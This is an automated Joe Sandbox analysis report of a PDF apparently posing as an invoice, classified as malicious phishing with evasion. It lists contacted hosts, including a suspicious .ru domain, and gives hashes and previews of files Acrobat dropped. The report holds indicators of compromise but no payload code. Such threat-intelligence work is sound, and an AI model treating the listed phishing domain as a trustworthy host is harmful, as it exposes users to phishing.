                          qs1ywa.vsmaemhjvk.ruUnited States
                          13335CLOUDFLARENETUStrue
                          151.101.66.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          23.46.224.249
                          e8652.dscx.akamaiedge.netUnited States
                          16625AKAMAI-ASUSfalse
                          172.64.41.3
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          IP
                          192.168.2.16
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1646841
                          Start date and time:2025-03-24 10:03:21 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:Invoice1-1706517.pdf
                          Detection:MAL
                          Classification:mal96.phis.evad.winPDF@34/45@9/91
                          Cookbook Comments:
                          • Found application associated with file extension: .pdf
                          • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 23.51.56.185, 3.219.243.226, 52.22.41.97, 3.233.129.217, 52.6.155.20, 172.64.41.3, 162.159.61.3, 23.210.73.6, 23.210.73.5, 23.219.161.132, 52.149.20.212, 23.47.168.24, 184.31.69.3
                          • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: qs1ywa.vsmaemhjvk.ru
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):290
                          Entropy (8bit):5.113183596641159
                          Encrypted:false
                          SSDEEP:
                          MD5:A87A6295C345EA684C6E53F57BB0A82B
                          SHA1:2F8F079328386F00981C47D7CDF7D6554D8A9646
                          SHA-256:D53CAAF88FF21712BDFF574AC6FE63C1BC6176E8574C301E1886BBA7B6E1960C
                          SHA-512:A266CC61F7CF5C61A359F23D150213EC66A0F9F20ABD62013567AD7088A9FFF2CD912A25DF488B5EDE8C45414E215561F2244E6577077553B12682DB1847E274
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.555 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/24-05:03:53.557 1a04 Recovering log #3.2025/03/24-05:03:53.557 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):334
                          Entropy (8bit):5.127063322482641
                          Encrypted:false
                          SSDEEP:
                          MD5:E803E901194E4BC2F15602FDD6391FC1
                          SHA1:A3802AE89BD7256A0DF42011B459B52D651D49AE
                          SHA-256:3129DEC16BC9522E216F072F3C96299577F677FE69B0169021D6C3D84341F4D5
                          SHA-512:217273B8D788ADB30D917EA2BA269FA3CE86A703045690815659A15A0352AE9A8CBE06ECE307FC19612424FF331E96FEF53FBEA52A1F7DFB07E108385DCFA1D5
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.453 1a24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/24-05:03:53.456 1a24 Recovering log #3.2025/03/24-05:03:53.457 1a24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):4.991087960333126
                          Encrypted:false
                          SSDEEP:
                          MD5:BC5B4369AB0CCEFA90387BD2E7159B64
                          SHA1:3F9A8E0D814670EF84F0C53262239341FC255F92
                          SHA-256:2A6AFFDCBC67763C8DD82FB1630ED95BEE86066CD894AE3595ECB3DDF2BDA33F
                          SHA-512:AAA7BCD97376AEA89B8467A03DBDBE4BDC530A89E4D2E46ACBEAAB71DCFCE17F3722A730C494CC5C1DE5BA9E516C8E526F778C3FC5830DA8C8411B6611FD77DC
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13387367045381780","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":107352},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:JSON data
                          Category:modified
                          Size (bytes):403
                          Entropy (8bit):4.953858338552356
                          Encrypted:false
                          SSDEEP:
                          MD5:4C313FE514B5F4E7E89329630909F8DC
                          SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                          SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                          SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                          Malicious:false
                          Reputation:unknown
                          Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4099
                          Entropy (8bit):5.223295371594883
                          Encrypted:false
                          SSDEEP:
                          MD5:0E44A4E81507F8251B9AB4B14F32579E
                          SHA1:C7900FB3412779BF4029C33E82C9FA0382D25460
                          SHA-256:6723CC0611B8C6F715DD3AB150915CFA674B65A975498C59D7A70C40AEF0C51C
                          SHA-512:4B3E66F27BCAD36A5C722257C60BE30C91FA7AF9FEC0877014180697E0639FA0587FC9EC1B95CEE4EE5532448EE9DA0A7A1F6F118228A36FFB6EA302DB87731B
                          Malicious:false
                          Reputation:unknown
                          Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):322
                          Entropy (8bit):5.132761083359997
                          Encrypted:false
                          SSDEEP:
                          MD5:5F21DBA1B437081F2D173717D0120E5C
                          SHA1:672A1C901F2A6D62DB3653FC8C2E4FB7CDD8AC4B
                          SHA-256:A8A70198F01A1C16B5286CB87F2E5D91FE6E0967EA88C26F9552D8BA38941F60
                          SHA-512:8C83D66B283B9FC4C085BCDD8F2CE6D2B296CE9C4ADD911B0AE87B5D28AF7DC2C424C4237DD9CCF88C6D3A4C1D39CA89F8BD7B6E353BD4E06AED621F6AC7B9EC
                          Malicious:false
                          Reputation:unknown
                          Preview:2025/03/24-05:03:53.592 1a24 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/24-05:03:53.593 1a24 Recovering log #3.2025/03/24-05:03:53.595 1a24 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PC bitmap, Windows 3.x format, 164 x -126 x 32, cbSize 82710, bits offset 54
                          Category:dropped
                          Size (bytes):82710
                          Entropy (8bit):1.2272662388702138
                          Encrypted:false
                          SSDEEP:
                          MD5:98F06D06F95BE5918A05315393F18BDF
                          SHA1:37E3683B0A201DB8E67E2341002E04152E145A9C
                          SHA-256:DEBA64094F095542C8C7D2FD63C311A724D644802201B8CF3660B531CFCAE3F2
                          SHA-512:80A45505F1B613B6172A32F52BC8C8AFE3DF8412499AD08116B356B8E081AA70F41A39144F4B91C10A5CD14F26943C34DF48E22A19AE1D0A6FEC63B42B255C01
                          Malicious:false
                          Reputation:unknown
                          Preview:BM.C......6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):57344
                          Entropy (8bit):3.291927920232006
                          Encrypted:false
                          SSDEEP:
                          MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                          SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                          SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                          SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):16928
                          Entropy (8bit):1.21414207559565
                          Encrypted:false
                          SSDEEP:
                          MD5:14930870FC72D8265A9DB3A11A8E0ECC
                          SHA1:022A8E2AA4D8D4CFFE67D30DFAB47310AA8166C9
                          SHA-256:70881AB12C35E37AE1560E7938936B664AD6424BBEE55BEC92682C12A3F39627
                          SHA-512:1897D9128E15378142C00BDF11E7532425DCF7894C39029D8DED7310FC4510EECA34B6F96FE2F72582FDBABB799CDF8E36916DE77551DCCFD9D5AFEC332BC90A
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c.....i/..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Certificate, Version=3
                          Category:dropped
                          Size (bytes):1391
                          Entropy (8bit):7.705940075877404
                          Encrypted:false
                          SSDEEP:
                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                          Malicious:false
                          Reputation:unknown
                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
                          Size (bytes):73305
                          Entropy (8bit):7.996028107841645
                          Encrypted:true
                          SSDEEP:
                          MD5:83142242E97B8953C386F988AA694E4A
                          SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                          SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                          SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                          Malicious:false
                          Reputation:unknown
                          Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):192
                          Entropy (8bit):2.7790941963225158
                          Encrypted:false
                          SSDEEP:
                          MD5:1C1000193B5BB84DE4B1B056FE95BB1E
                          SHA1:C708E148B826291A96282AA5CFA984F340BC2531
                          SHA-256:6131858839EEEE5D9188943B2AE8BCD66E26915530239B4BD3028ADF098F71E3
                          SHA-512:350C228A6D2840BD94C02CDDD12908EFEDB0F86F2E6CFF8D4979E32A05CFD4B77E3E9D0CF960DC31000DE42801C9DF588B5199415D1DFCB1B6FC82FD5B4366B4
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... ........8n......(....................................................... ..........W.....9..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):330
                          Entropy (8bit):3.189712167018517
                          Encrypted:false
                          SSDEEP:
                          MD5:F531CFB79B6306A3B7D0BC68467DB001
                          SHA1:6F50962BC3636EC5143B669D07115489EFF2765B
                          SHA-256:50CBBED9167F107E9EBAD32FDB08F0DECC627F215931A031CC710F1FD5C9A6D8
                          SHA-512:22CFB5AF637F658A24B907767B864A435ABD7FEFA9714DCFB159DA4DBB0780031F456762FF1FD932429A271BF04C5C7ADD4BF7059BBB0B14737073ADFF8CE7B2
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... ..............(....................................................... ..................(...........Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):185099
                          Entropy (8bit):5.182478651346149
                          Encrypted:false
                          SSDEEP:
                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                          Malicious:false
                          Reputation:unknown
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.381897405086421
                          Encrypted:false
                          SSDEEP:
                          MD5:5000A710FA400BFCEE8BB6B1DF7C40F3
                          SHA1:4B6474E65953091D93F0B35D0A2B12BFB3C0CE4C
                          SHA-256:6F3FAD560D36EA69CFCABCC0C29C5DC08B767E8DE76CD156003D9B9C74118673
                          SHA-512:018053783F2E84A8BAAF0DA22796808CCFEF180BD131AC63B33C914985A67840CEAF978F9440936B3BB81864B7A7DEE41C0BEE0302B8E703388D885D118DE7FD
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.3270070325352785
                          Encrypted:false
                          SSDEEP:
                          MD5:40C1E37D61B6FDDCB7C8CBC2F24A5990
                          SHA1:E128B365396BB1B0F4F95983BD78BAD926DC75E8
                          SHA-256:927FAD2B3CA0ED46D2BAFF7AE1E58E960AD90C824C1810DEBBCAA311EB5B3303
                          SHA-512:A881FEA90CEAF4E0717DC0B6E6DA690921A2B45FE11F6E7B7B95E534A18B57E67EECBBD20A89C213B141D488D315E37605764E35E48A975F31FDA346F577AE73
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.305828107580877
                          Encrypted:false
                          SSDEEP:
                          MD5:EF071A3A30F1B96C229861A7C27C4F0B
                          SHA1:56B370C924F9106ED9FB77DDFF39AD93CFFB2F2A
                          SHA-256:71A32AFD376F1437E99FD76F2AB99DD1EF878EC4067B38D4C6A2708E7DCBDCEE
                          SHA-512:7EE3DC3F0A62EA8ABC03663B6D0AACB2C5EBB7FCE7CF08EB41D7FAEBF13D0DBC17348D62DCC44C799A05944B13E42AED0C9EF64DC0546766F4CF89E296BFC869
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):285
                          Entropy (8bit):5.3709279102754595
                          Encrypted:false
                          SSDEEP:
                          MD5:485D4B509EA79F00F7092D04DB03CE6F
                          SHA1:BFFAA753C355C8433E76AA08E14638C31FB60608
                          SHA-256:BA49BE2BF9AD40A15B3746EA7C5CA70704B3F1BDD3F5CCD0D68FAEFF043CD16F
                          SHA-512:373C1DF6F4513601884A29D987657B5C7B1A0C5A1406CD83BF8A1727805BFA3163341222424AC354BE913FFD5D8FFEF30294A2B1903D20F4C28B7D40E043DA85
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2129
                          Entropy (8bit):5.841203258309073
                          Encrypted:false
                          SSDEEP:
                          MD5:0C0B62C905FD70EEF1EF22B7E1F3791F
                          SHA1:BF836940032C5575DC1C3D0B3D38A342030B9908
                          SHA-256:3F24E029BE478EEF2AC7BEE8D76FBC4A0D32583CE0B8C7DC2A545AC2FCFA55FA
                          SHA-512:93A524C88C0C016F07F950E6414A177CB7C9439F3DA8D5E53961E2C1137D5B04AA28C542E516771D1B79D535AA66FDB2AE1B5E42DDF6C5FACE067DBCC4EE9495
                          Malicious:false
                          Reputation:unknown
